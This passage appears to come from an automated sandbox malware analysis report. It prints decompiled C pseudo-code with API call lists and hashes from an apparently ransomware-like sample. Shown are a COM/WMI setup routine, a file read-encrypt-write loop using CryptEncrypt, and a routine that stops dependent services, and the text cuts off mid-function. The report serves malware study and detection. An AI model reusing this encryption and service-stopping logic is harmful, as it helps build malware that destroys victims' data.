                          • Instruction ID: a116ea67384d82f7f255bfa194e906c6e605bc305b6a5720dadbfb9a64e3845a
                          • Opcode Fuzzy Hash: b3385077e77aa403fd61e97550a3a433c7845a2981806470794ae1e973da7c55
                          • Instruction Fuzzy Hash: E6B11BB0D102298ADB20DF24DD95BEDB7B8AF58304F4046EDD60DA7251EB706B88CF59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 43%
                          			E012FB290(void* __ebx, signed int __edi, char _a4) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				void* _v24;
                          				void* _v28;
                          				void* _v32;
                          				void* _v36;
                          				void* _v40;
                          				void* _v44;
                          				intOrPtr _v52;
                          				char _v60;
                          				void* _v64;
                          				intOrPtr _v68;
                          				void* _v72;
                          				void* _v76;
                          				intOrPtr _v80;
                          				signed int _v88;
                          				intOrPtr _v92;
                          				short _v108;
                          				signed int _v112;
                          				intOrPtr _v116;
                          				short _v132;
                          				signed int _v136;
                          				intOrPtr _v140;
                          				short _v156;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t123;
                          				signed int _t124;
                          				char* _t127;
                          				intOrPtr* _t131;
                          				intOrPtr* _t132;
                          				intOrPtr* _t133;
                          				short _t134;
                          				char _t135;
                          				signed int _t136;
                          				intOrPtr* _t137;
                          				intOrPtr* _t139;
                          				intOrPtr* _t141;
                          				intOrPtr* _t143;
                          				intOrPtr _t144;
                          				signed int _t145;
                          				intOrPtr* _t147;
                          				intOrPtr* _t149;
                          				intOrPtr _t150;
                          				signed int _t151;
                          				intOrPtr* _t160;
                          				intOrPtr* _t162;
                          				intOrPtr _t163;
                          				intOrPtr* _t166;
                          				signed int _t168;
                          				intOrPtr* _t170;
                          				intOrPtr* _t175;
                          				intOrPtr* _t177;
                          				intOrPtr* _t179;
                          				intOrPtr* _t181;
                          				intOrPtr _t185;
                          				intOrPtr _t186;
                          				intOrPtr _t192;
                          				intOrPtr _t199;
                          				intOrPtr _t205;
                          				intOrPtr* _t212;
                          				intOrPtr* _t226;
                          				intOrPtr* _t227;
                          				intOrPtr* _t228;
                          				signed int _t251;
                          				signed int _t253;
                          				intOrPtr _t254;
                          				void* _t255;
                          				void* _t256;
                          				intOrPtr* _t257;
                          				intOrPtr* _t258;
                          				intOrPtr* _t259;
                          				intOrPtr* _t260;
                          				intOrPtr* _t261;
                          				intOrPtr* _t262;
                          				intOrPtr _t263;
                          				signed int _t264;
                          				void* _t265;
                          				void* _t266;
                          
                          				_t251 = __edi;
                          				_t266 = _t265 - 0x8c;
                          				_t123 =  *0x13a4018; // 0x39cca9f6
                          				_t124 = _t123 ^ _t264;
                          				_v20 = _t124;
                          				 *[fs:0x0] =  &_v16;
                          				_v72 = _a4;
                          				_t127 =  &_v32;
                          				_v32 = 0;
                          				__imp__CoCreateInstance(0x1378f1c, 0, 1, 0x1378f2c, _t127, _t124, __edi, _t255, __ebx,  *[fs:0x0], 0x1365bd0, 0xffffffff);
                          				_t268 = _t127;
                          				if(_t127 >= 0) {
                          					_v28 = 0;
                          					_t257 =  *((intOrPtr*)( *_v32 + 0xc));
                          					_t131 = E012F93F0( &_v108, 0x13a4c74, __edi, _t268);
                          					_v8 = 0;
                          					_t269 =  *((intOrPtr*)(_t131 + 0x14)) - 8;
                          					if( *((intOrPtr*)(_t131 + 0x14)) >= 8) {
                          						_t131 =  *_t131;
                          					}
                          					_t132 = E012F9580( &_v64, _t269, _t131);
                          					_v8 = 1;
                          					_t133 =  *_t132;
                          					if(_t133 == 0) {
                          						_t134 = 0;
                          						__eflags = 0;
                          					} else {
                          						_t134 =  *_t133;
                          					}
                          					_t135 =  *_t257(_v32, _t134, 0, 0, 0, 0, 0, 0,  &_v28);
                          					_t258 = _v64;
                          					_t253 = _t251 | 0xffffffff;
                          					_t212 = __imp__#6;
                          					_v36 = _t135;
                          					if(_t258 != 0) {
                          						asm("lock xadd [esi+0x8], ecx");
                          						if(_t253 == 1 && _t258 != 0) {
                          							_t205 =  *_t258;
                          							if(_t205 != 0) {
                          								 *_t212(_t205);
                          								 *_t258 = 0;
                          							}
                          							_t206 =  *((intOrPtr*)(_t258 + 4));
                          							if( *((intOrPtr*)(_t258 + 4)) != 0) {
                          								L0132ECE6(_t206);
                          								_t266 = _t266 + 4;
                          								 *((intOrPtr*)(_t258 + 4)) = 0;
                          							}
                          							_push(0xc);
                          							E0132EABA(_t258);
                          							_t266 = _t266 + 8;
                          						}
                          						_v64 = 0;
                          					}
                          					_v8 = 0xffffffff;
                          					_t136 = _v88;
                          					if(_t136 >= 8) {
                          						_push(2 + _t136 * 2);
                          						_t136 = E012F56A0(_t212, _t253, _v108);
                          						_t266 = _t266 + 8;
                          					}
                          					if(_v36 >= 0) {
                          						__imp__CoSetProxyBlanket(_v28, 0xa, 0, 0, 3, 3, 0, 0);
                          						_t278 = _t136;
                          						if(_t136 >= 0) {
                          							_t141 = E012F93F0( &_v132, 0x13a510c, _t253, _t278);
                          							_v8 = 2;
                          							_t279 =  *((intOrPtr*)(_t141 + 0x14)) - 8;
                          							if( *((intOrPtr*)(_t141 + 0x14)) >= 8) {
                          								_t141 =  *_t141;
                          							}
                          							_t143 =  *((intOrPtr*)(E012F9580( &_v64, _t279, _t141)));
                          							if(_t143 == 0) {
                          								_t144 = 0;
                          								__eflags = 0;
                          							} else {
                          								_t144 =  *_t143;
                          							}
                          							__imp__#2(_t144);
                          							_t259 = _v64;
                          							_v80 = _t144;
                          							if(_t259 != 0) {
                          								asm("lock xadd [esi+0x8], ecx");
                          								if(_t253 == 1 && _t259 != 0) {
                          									_t199 =  *_t259;
                          									if(_t199 != 0) {
                          										 *_t212(_t199);
                          										 *_t259 = 0;
                          									}
                          									_t200 =  *((intOrPtr*)(_t259 + 4));
                          									if( *((intOrPtr*)(_t259 + 4)) != 0) {
                          										L0132ECE6(_t200);
                          										_t266 = _t266 + 4;
                          										 *((intOrPtr*)(_t259 + 4)) = 0;
                          									}
                          									_push(0xc);
                          									E0132EABA(_t259);
                          									_t266 = _t266 + 8;
                          								}
                          								_v64 = 0;
                          							}
                          							_v8 = 0xffffffff;
                          							_t145 = _v112;
                          							_t286 = _t145 - 8;
                          							if(_t145 >= 8) {
                          								_push(2 + _t145 * 2);
                          								E012F56A0(_t212, _t253, _v132);
                          								_t266 = _t266 + 8;
                          							}
                          							_v116 = 0;
                          							_v112 = 7;
                          							_v132 = 0;
                          							_t147 = E012F93F0( &_v108, 0x13a501c, _t253, _t286);
                          							_v8 = 3;
                          							_t287 =  *((intOrPtr*)(_t147 + 0x14)) - 8;
                          							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
                          								_t147 =  *_t147;
                          							}
                          							_t149 =  *((intOrPtr*)(E012F9580( &_v76, _t287, _t147)));
                          							if(_t149 == 0) {
                          								_t150 = 0;
                          								__eflags = 0;
                          							} else {
                          								_t150 =  *_t149;
                          							}
                          							__imp__#2(_t150);
                          							_t260 = _v76;
                          							_v68 = _t150;
                          							if(_t260 != 0) {
                          								asm("lock xadd [esi+0x8], ecx");
                          								if(_t253 == 1 && _t260 != 0) {
                          									_t192 =  *_t260;
                          									if(_t192 != 0) {
                          										 *_t212(_t192);
                          										 *_t260 = 0;
                          									}
                          									_t193 =  *((intOrPtr*)(_t260 + 4));
                          									if( *((intOrPtr*)(_t260 + 4)) != 0) {
                          										L0132ECE6(_t193);
                          										_t266 = _t266 + 4;
                          										 *((intOrPtr*)(_t260 + 4)) = 0;
                          									}
                          									_push(0xc);
                          									E0132EABA(_t260);
                          									_t266 = _t266 + 8;
                          								}
                          								_v76 = 0;
                          							}
                          							_v8 = 0xffffffff;
                          							_t151 = _v88;
                          							if(_t151 >= 8) {
                          								_push(2 + _t151 * 2);
                          								E012F56A0(_t212, _t253, _v108);
                          								_t266 = _t266 + 8;
                          							}
                          							_t226 = _v28;
                          							_v92 = 0;
                          							_v108 = 0;
                          							_v40 = 0;
                          							_v88 = 7;
                          							 *((intOrPtr*)( *_t226 + 0x18))(_t226, _v68, 0, 0,  &_v40, 0);
                          							_t227 = _v40;
                          							_v44 = 0;
                          							 *((intOrPtr*)( *_t227 + 0x4c))(_t227, _v80, 0,  &_v44, 0);
                          							_t228 = _v44;
                          							_v24 = 0;
                          							 *((intOrPtr*)( *_t228 + 0x3c))(_t228, 0,  &_v24);
                          							_v60 = 8;
                          							_t160 = _v72;
                          							_t295 =  *((intOrPtr*)(_t160 + 0x14)) - 8;
                          							if( *((intOrPtr*)(_t160 + 0x14)) >= 8) {
                          								_t160 =  *_t160;
                          							}
                          							_t162 =  *((intOrPtr*)(E012F9580( &_v72, _t295, _t160)));
                          							if(_t162 == 0) {
                          								_t163 = 0;
                          								__eflags = 0;
                          							} else {
                          								_t163 =  *_t162;
                          							}
                          							_t261 = _v72;
                          							_v52 = _t163;
                          							if(_t261 != 0) {
                          								asm("lock xadd [esi+0x8], edi");
                          								if(_t253 == 0 && _t261 != 0) {
                          									_t185 =  *_t261;
                          									if(_t185 != 0) {
                          										 *_t212(_t185);
                          										 *_t261 = 0;
                          									}
                          									_t186 =  *((intOrPtr*)(_t261 + 4));
                          									_t301 = _t186;
                          									if(_t186 != 0) {
                          										L0132ECE6(_t186);
                          										_t266 = _t266 + 4;
                          										 *((intOrPtr*)(_t261 + 4)) = 0;
                          									}
                          									_push(0xc);
                          									E0132EABA(_t261);
                          									_t266 = _t266 + 8;
                          								}
                          							}
                          							_t262 =  *((intOrPtr*)( *_v24 + 0x14));
                          							_t166 = E012F93F0( &_v156, 0x13a4e9c, _t253, _t301);
                          							_v8 = 4;
                          							if( *((intOrPtr*)(_t166 + 0x14)) >= 8) {
                          								_t166 =  *_t166;
                          							}
                          							 *_t262(_v24, _t166, 0,  &_v60, 0);
                          							_v8 = 0xffffffff;
                          							_t168 = _v136;
                          							if(_t168 >= 8) {
                          								_push(2 + _t168 * 2);
                          								E012F56A0(_t212, _t253, _v156);
                          							}
                          							_t254 = _v80;
                          							_t263 = _v68;
                          							_v36 = 0;
                          							_v156 = 0;
                          							_t170 = _v28;
                          							_v140 = 0;
                          							_v136 = 7;
                          							 *((intOrPtr*)( *_t170 + 0x60))(_t170, _t263, _t254, 0, 0, _v24,  &_v36, 0);
                          							__imp__#9( &_v60);
                          							 *_t212(_t263);
                          							 *_t212(_t254);
                          							_t175 = _v40;
                          							 *((intOrPtr*)( *_t175 + 8))(_t175);
                          							_t177 = _v24;
                          							 *((intOrPtr*)( *_t177 + 8))(_t177);
                          							_t179 = _v44;
                          							 *((intOrPtr*)( *_t179 + 8))(_t179);
                          							_t181 = _v36;
                          							 *((intOrPtr*)( *_t181 + 8))(_t181);
                          						}
                          						_t139 = _v28;
                          						 *((intOrPtr*)( *_t139 + 8))(_t139);
                          					}
                          					_t137 = _v32;
                          					 *((intOrPtr*)( *_t137 + 8))(_t137);
                          				}
                          				 *[fs:0x0] = _v16;
                          				_pop(_t256);
                          				return E0132EA79(_v20 ^ _t264, _t256);
                          			}


                          APIs
                          • CoCreateInstance.OLE32(01378F1C,00000000,00000001,01378F2C,00000000,39CCA9F6), ref: 012FB2DD
                          • SysFreeString.OLEAUT32(00000000), ref: 012FB36D
                          • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 012FB3DB
                          • SysAllocString.OLEAUT32(00000000), ref: 012FB41B
                          • SysFreeString.OLEAUT32(00000000), ref: 012FB440
                          • SysAllocString.OLEAUT32(00000000), ref: 012FB4D9
                          • SysFreeString.OLEAUT32(00000000), ref: 012FB4FE
                          • SysFreeString.OLEAUT32(00000000), ref: 012FB5F5
                          • VariantClear.OLEAUT32(?), ref: 012FB6BE
                          • SysFreeString.OLEAUT32(?), ref: 012FB6C5
                          • SysFreeString.OLEAUT32(?), ref: 012FB6C8
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$BlanketClearCreateInstanceProxyVariant
                          • String ID:
                          • API String ID: 2934474526-0
                          • Opcode ID: 54d2c062eb7ccd647e255ce26d842026c7f691b6eacdbfc98c1307cc80c650a6
                          • Instruction ID: 95e35b19750988b903e80324468de1110dc11663d28fe3b1bcec5c3c8db34f02
                          • Opcode Fuzzy Hash: 54d2c062eb7ccd647e255ce26d842026c7f691b6eacdbfc98c1307cc80c650a6
                          • Instruction Fuzzy Hash: A9E14F70A102199FEB20DF98DC45BAEBBB9FF04714F14416CEA05AB290DB75E945CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E01309740(void* __ebx, void* __ecx, union _LARGE_INTEGER* __edx, void* __edi, intOrPtr _a4, void* _a8) {
                          				struct _OVERLAPPED* _v8;
                          				char _v16;
                          				signed int _v20;
                          				union _LARGE_INTEGER* _v24;
                          				void _v28;
                          				long _v32;
                          				union _LARGE_INTEGER* _v36;
                          				void* _v40;
                          				intOrPtr _v44;
                          				char _v48;
                          				union _LARGE_INTEGER* _v52;
                          				void* _v56;
                          				intOrPtr _v60;
                          				long _v64;
                          				char _v80;
                          				long _v84;
                          				intOrPtr _v88;
                          				long _v92;
                          				char _v108;
                          				intOrPtr _v116;
                          				intOrPtr _v120;
                          				long _v124;
                          				intOrPtr _v128;
                          				void _v132;
                          				intOrPtr _v136;
                          				intOrPtr _v140;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t100;
                          				signed int _t101;
                          				char* _t107;
                          				intOrPtr _t108;
                          				intOrPtr _t111;
                          				intOrPtr _t118;
                          				intOrPtr _t133;
                          				intOrPtr _t140;
                          				union _LARGE_INTEGER _t143;
                          				void* _t158;
                          				void* _t160;
                          				intOrPtr _t169;
                          				union _LARGE_INTEGER* _t177;
                          				union _LARGE_INTEGER* _t178;
                          				union _LARGE_INTEGER* _t179;
                          				long _t180;
                          				void* _t182;
                          				void* _t185;
                          				intOrPtr _t186;
                          				union _LARGE_INTEGER _t187;
                          				union _LARGE_INTEGER _t188;
                          				intOrPtr _t190;
                          				signed int _t191;
                          				void* _t192;
                          				void* _t193;
                          				intOrPtr _t200;
                          
                          				_t177 = __edx;
                          				_push(0xffffffff);
                          				_push(0x1366d8d);
                          				_push( *[fs:0x0]);
                          				_t193 = _t192 - 0x7c;
                          				_t100 =  *0x13a4018; // 0x39cca9f6
                          				_t101 = _t100 ^ _t191;
                          				_v20 = _t101;
                          				_push(_t101);
                          				 *[fs:0x0] =  &_v16;
                          				_t158 = __ecx;
                          				_t103 = _a4;
                          				_t182 = _a8;
                          				if(_a4 == 0 || _t182 == 0xffffffff || E01309150(_t103, 0,  *((intOrPtr*)(__ecx + 0x88))) <  *((intOrPtr*)(_t158 + 0x88))) {
                          					L33:
                          					goto L34;
                          				} else {
                          					_t107 =  &_v48;
                          					asm("xorps xmm0, xmm0");
                          					asm("movq [ebp-0x2c], xmm0");
                          					__imp__GetFileSizeEx(_t182, _t107);
                          					if(_t107 == 0) {
                          						goto L33;
                          					}
                          					_t200 = _v44;
                          					_t108 =  *((intOrPtr*)(_t158 + 0x90));
                          					if(_t200 < 0 || _t200 <= 0 && _v48 < _t108) {
                          						goto L33;
                          					} else {
                          						_push(0);
                          						E012F7D00(_t158,  &_v80, _t177,  *((intOrPtr*)(_t158 + 0x88)));
                          						_v8 = 0;
                          						asm("xorps xmm0, xmm0");
                          						_t186 =  *((intOrPtr*)(_t158 + 0x8c));
                          						asm("movq [ebp-0x24], xmm0");
                          						_v84 = 0;
                          						_v32 = 0;
                          						_v140 = E01364FA0(_v48, _v44, _t186, 0);
                          						_t111 = 0;
                          						_v24 = _t177;
                          						_v136 = 0;
                          						if(_t186 == 0) {
                          							L15:
                          							asm("xorps xmm0, xmm0");
                          							asm("movq [ebp-0x18], xmm0");
                          							_t178 = _v24;
                          							_t187 = _v28;
                          							asm("movq [ebp-0x18], xmm0");
                          							_push(2);
                          							_v40 = _v28;
                          							_v56 = _t187;
                          							_v52 = _t178;
                          							_v36 = _v24;
                          							if(SetFilePointerEx(_t182, _t187, _t178,  &_v40) == 0) {
                          								L24:
                          								asm("xorps xmm0, xmm0");
                          								asm("movq [ebp-0x18], xmm0");
                          								_t179 = _v24;
                          								_t188 = _v28;
                          								asm("movq [ebp-0x18], xmm0");
                          								_push(2);
                          								_v40 = _v28;
                          								_v56 = _t188;
                          								_v52 = _t179;
                          								_v36 = _v24;
                          								if(SetFilePointerEx(_t182, _t188, _t179,  &_v40) == 0) {
                          									L31:
                          									_t118 = _v60;
                          									if(_t118 >= 0x10) {
                          										_push(_t118 + 1);
                          										E012F56A0(_t158, _t182, _v80);
                          									}
                          									goto L33;
                          								}
                          								_v28 =  *((intOrPtr*)(_t158 + 0x84));
                          								_v24 =  *((intOrPtr*)(_t158 + 0x8c));
                          								if(WriteFile(_t182,  &_v28, 8,  &_v32, 0) == 0 || _v32 != 8) {
                          									goto L31;
                          								} else {
                          									_t160 = 1;
                          									goto L28;
                          								}
                          							}
                          							E01309EE0(_t158, _t158, _t178, _t182,  &_v108, _a4);
                          							_t131 =  >=  ? _v108 :  &_v108;
                          							if(WriteFile(_t182,  >=  ? _v108 :  &_v108, _v92,  &_v32, 0) == 0) {
                          								L22:
                          								_t133 = _v88;
                          								if(_t133 >= 0x10) {
                          									_push(_t133 + 1);
                          									E012F56A0(_t158, _t182, _v108);
                          									_t193 = _t193 + 8;
                          								}
                          								goto L24;
                          							}
                          							_t180 = _v92;
                          							if(_v32 != _t180) {
                          								goto L22;
                          							}
                          							_v132 = _v48;
                          							_v128 = _v44;
                          							_v124 = _t180;
                          							_v120 = 3;
                          							_v116 = 0x1030307;
                          							if(WriteFile(_t182,  &_v132, 0x18,  &_v32, 0) != 0) {
                          								goto L22;
                          							} else {
                          								_t140 = _v88;
                          								if(_t140 >= 0x10) {
                          									_push(_t140 + 1);
                          									E012F56A0(_t158, _t182, _v108);
                          									_t193 = _t193 + 8;
                          								}
                          								goto L21;
                          							}
                          						} else {
                          							_t190 = _a4;
                          							while(1) {
                          								_t143 = E0132F450(_t111, 0, _v140, _t177);
                          								_push(0);
                          								_v56 = _t143;
                          								_v52 = _t177;
                          								if(SetFilePointerEx(_t182, _t143, _t177,  &_v40) == 0) {
                          									break;
                          								}
                          								_t146 =  >=  ? _v80 :  &_v80;
                          								if(ReadFile(_t182,  >=  ? _v80 :  &_v80, _v64,  &_v84, 0) == 0) {
                          									break;
                          								}
                          								_push(0);
                          								if(SetFilePointerEx(_t182, _v40, _v36,  &_v56) == 0 || E0130A0A0(_t190, 0,  &_v80,  *((intOrPtr*)(_t158 + 0x88)),  *((intOrPtr*)(_t158 + 0x88))) == 0) {
                          									break;
                          								} else {
                          									_t154 =  >=  ? _v80 :  &_v80;
                          									if(WriteFile(_t182,  >=  ? _v80 :  &_v80, _v64,  &_v32, 0) == 0) {
                          										break;
                          									}
                          									_t177 = _v24;
                          									_t111 = _v136 + 1;
                          									_v136 = _t111;
                          									if(_t111 <  *((intOrPtr*)(_t158 + 0x8c))) {
                          										continue;
                          									}
                          									goto L15;
                          								}
                          							}
                          							L21:
                          							_t160 = 0;
                          							L28:
                          							_t169 = _v60;
                          							if(_t169 >= 0x10) {
                          								_push(_t169 + 1);
                          								E012F56A0(_t160, _t182, _v80);
                          							}
                          							L34:
                          							 *[fs:0x0] = _v16;
                          							_pop(_t185);
                          							return E0132EA79(_v20 ^ _t191, _t185);
                          						}
                          					}
                          				}
                          			}


                          APIs
                            • Part of subcall function 01309150: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A
                          • GetFileSizeEx.KERNEL32(?,?,?,00000000,?,39CCA9F6,00000010,00000000), ref: 013097AB
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01309810
                          • SetFilePointerEx.KERNEL32(?,00000000,?,01366D8D,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,00000000), ref: 0130984F
                          • ReadFile.KERNEL32(?,?,?,00000000,00000000,?,01366D8D,00000000,00000000,00000000,?,?,?,00000000,?,00000000), ref: 01309873
                          • SetFilePointerEx.KERNEL32(?,01366D8D,000000FF,?,00000000,?,01366D8D,00000000,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0130988E
                          • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,?,?,?,01366D8D,00000000,00000000,00000000,?), ref: 013098CE
                          • SetFilePointerEx.KERNEL32(?,01308D6E,00000000,01366D8D,00000002,?,00000000,?,00000000,?,00000000), ref: 01309926
                          • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?), ref: 0130995E
                          • WriteFile.KERNEL32(?,?,00000018,00000000,00000000), ref: 01309996
                          • SetFilePointerEx.KERNEL32(?,01308D6E,00000000,01366D8D,00000002), ref: 013099F8
                          • WriteFile.KERNEL32(?,01308D6E,00000008,00000000,00000000), ref: 01309A21
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: File$PointerWrite$CryptEncryptReadSizeUnothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 609063662-0
                          • Opcode ID: ee0e9c174d04e935e039ec0a768999cc95cc77f40ffd0c3039a6a7b850ea51cd
                          • Instruction ID: 4cd43bf1ce08781b8b2767a4a440cf761586787c7b579e615451e8f5a8adb386
                          • Opcode Fuzzy Hash: ee0e9c174d04e935e039ec0a768999cc95cc77f40ffd0c3039a6a7b850ea51cd
                          • Instruction Fuzzy Hash: 6DA11C71D00209EFEF11CFA4D895BEEBBB9FF49714F548129E914A7281DB70A984CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E012FBEE0(void* __ebx, void* __edi, void* _a4, void* _a8, long _a12) {
                          				struct _ENUM_SERVICE_STATUS* _v8;
                          				signed int _v12;
                          				char _v20;
                          				signed int _v32;
                          				int _v36;
                          				int _v40;
                          				struct _ENUM_SERVICE_STATUS* _v44;
                          				intOrPtr _v72;
                          				struct _SERVICE_STATUS _v76;
                          				struct _ENUM_SERVICE_STATUS* _v80;
                          				void* _v84;
                          				signed int _v88;
                          				long _v92;
                          				void* _v96;
                          				short* _v100;
                          				void* __esi;
                          				signed int _t46;
                          				signed int _t47;
                          				signed int _t62;
                          				short* _t64;
                          				struct _SERVICE_STATUS* _t71;
                          				void* _t82;
                          				void* _t84;
                          				void* _t86;
                          				struct _ENUM_SERVICE_STATUS* _t88;
                          				long _t89;
                          				signed int _t90;
                          
                          				_push(0xfffffffe);
                          				_push(0x139c3f8);
                          				_push(E01345BB0);
                          				_push( *[fs:0x0]);
                          				_t46 =  *0x13a4018; // 0x39cca9f6
                          				_v12 = _v12 ^ _t46;
                          				_t47 = _t46 ^ _t90;
                          				_v32 = _t47;
                          				_push(_t47);
                          				 *[fs:0x0] =  &_v20;
                          				_v84 = _a4;
                          				_t82 = _a8;
                          				if(_t82 != 0) {
                          					_v36 = 0;
                          					_v40 = 0;
                          					asm("xorps xmm0, xmm0");
                          					asm("movups [ebp-0x48], xmm0");
                          					asm("movups [ebp-0x38], xmm0");
                          					_v44 = 0;
                          					_v92 = GetTickCount();
                          					if(EnumDependentServicesW(_t82, 1, 0, 0,  &_v36,  &_v40) == 0 && GetLastError() == 0xea) {
                          						_t88 = HeapAlloc(GetProcessHeap(), 8, _v36);
                          						_v80 = _t88;
                          						if(_t88 != 0) {
                          							_v8 = 0;
                          							if(EnumDependentServicesW(_t82, 1, _t88, _v36,  &_v36,  &_v40) != 0) {
                          								_t62 = 0;
                          								_t89 = _a12;
                          								while(1) {
                          									_v88 = _t62;
                          									if(_t62 >= _v40) {
                          										break;
                          									}
                          									asm("movups xmm1, [ecx+eax*4]");
                          									asm("movups xmm0, [ecx+eax*4+0x10]");
                          									asm("movups [ebp-0x70], xmm0");
                          									_t64 =  *(_v80 + 0x20 + (_t62 + _t62 * 8) * 4);
                          									_v100 = _t64;
                          									asm("movd eax, xmm1");
                          									_t84 = OpenServiceW(_v84, _t64, 0x24);
                          									_v96 = _t84;
                          									if(_t84 != 0) {
                          										_v8 = 1;
                          										if(ControlService(_t84, 1,  &_v76) != 0) {
                          											while(_v72 != 1) {
                          												Sleep(_t89);
                          												_t71 =  &_v76;
                          												__imp__QueryServiceStatusEx(_t84, 0, _t71, 0x24,  &_v36);
                          												if(_t71 != 0 && _v72 != 1 && GetTickCount() - _v92 <= _t89) {
                          													continue;
                          												}
                          												goto L14;
                          											}
                          										}
                          										L14:
                          										_v8 = 0;
                          										E012FC072(_t84);
                          										_t62 = _v88 + 1;
                          										continue;
                          									}
                          									break;
                          								}
                          								_t88 = _v80;
                          							}
                          							_v8 = 0xfffffffe;
                          							E012FC0AA(_t88);
                          						}
                          					}
                          				}
                          				 *[fs:0x0] = _v20;
                          				_pop(_t86);
                          				return E0132EA79(_v32 ^ _t90, _t86);
                          			}


                          APIs
                          • GetTickCount.KERNEL32 ref: 012FBF44
                          • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 012FBF5C
                          • GetLastError.KERNEL32 ref: 012FBF6A
                          • GetProcessHeap.KERNEL32 ref: 012FBF7E
                          • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 012FBF88
                          • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 012FBFB1
                          • OpenServiceW.ADVAPI32(?,?,00000024), ref: 012FBFF4
                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 012FC011
                          • Sleep.KERNEL32(?), ref: 012FC027
                          • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 012FC03A
                          • GetTickCount.KERNEL32 ref: 012FC04A
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Service$CountDependentEnumHeapServicesTick$AllocControlErrorLastOpenProcessQuerySleepStatus
                          • String ID:
                          • API String ID: 2237175040-0
                          • Opcode ID: 9b260951e84a67de9dfb016988f3cdccea92fd2bac671af33abd98846c780245
                          • Instruction ID: 2553029e3840156b005085b0cb406da9087d77877d190315609117f979012e93
                          • Opcode Fuzzy Hash: 9b260951e84a67de9dfb016988f3cdccea92fd2bac671af33abd98846c780245
                          • Instruction Fuzzy Hash: F251297191020DDBDB21CFA8D848FEEFBB8FF49700F14812DEA15A7280DB75A9558B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 44%
                          			E0132FAF0(void* __ebx, char* _a4) {
                          				int _v8;
                          				signed int _v12;
                          				char _v20;
                          				short* _v28;
                          				signed int _v32;
                          				short* _v36;
                          				int _v40;
                          				int _v44;
                          				intOrPtr _v56;
                          				void* _v60;
                          				void* __esi;
                          				signed int _t30;
                          				signed int _t31;
                          				char _t33;
                          				int _t34;
                          				signed short _t36;
                          				signed short _t38;
                          				void* _t49;
                          				short* _t50;
                          				int _t52;
                          				char* _t58;
                          				int _t59;
                          				char* _t61;
                          				intOrPtr* _t62;
                          				intOrPtr* _t63;
                          				char* _t69;
                          				intOrPtr _t70;
                          				int _t71;
                          				intOrPtr* _t72;
                          				short* _t75;
                          				void* _t78;
                          				signed int _t79;
                          				void* _t81;
                          				short* _t82;
                          
                          				_push(0xfffffffe);
                          				_push(0x13a0408);
                          				_push(E01345BB0);
                          				_push( *[fs:0x0]);
                          				_t82 = _t81 - 0x18;
                          				_t30 =  *0x13a4018; // 0x39cca9f6
                          				_v12 = _v12 ^ _t30;
                          				_t31 = _t30 ^ _t79;
                          				_v32 = _t31;
